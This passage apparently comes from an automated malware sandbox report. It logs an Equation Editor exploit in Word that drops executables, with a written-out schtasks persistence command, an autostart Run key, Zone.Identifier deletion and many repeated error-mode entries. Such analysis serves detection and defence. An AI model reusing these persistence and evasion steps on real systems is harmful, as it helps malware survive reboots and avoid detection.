Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_00261BE3 push ebx; iretd		11_2_00261C52
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 17_2_00221C13 push ebx; iretd		17_2_00221C52

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 7.77653013154
Source: initial sample	Static PE information: section name: .text entropy: 7.77653013154
Source: initial sample	Static PE information: section name: .text entropy: 7.77653013154
Source: initial sample	Static PE information: section name: .text entropy: 7.77653013154

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	File created: C:\Users\user\AppData\Roaming\newapp\newapp.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\booobb[1].exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	File created: C:\Users\user\AppData\Roaming\yxnDFepLbf.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	File created: C:\Users\user\AppData\Local\Temp\tmpG796.tmp (copy)			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7B0A.tmp'

Creates an autostart registry key

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newapp			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newapp			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

File opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier read attributes | delete

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
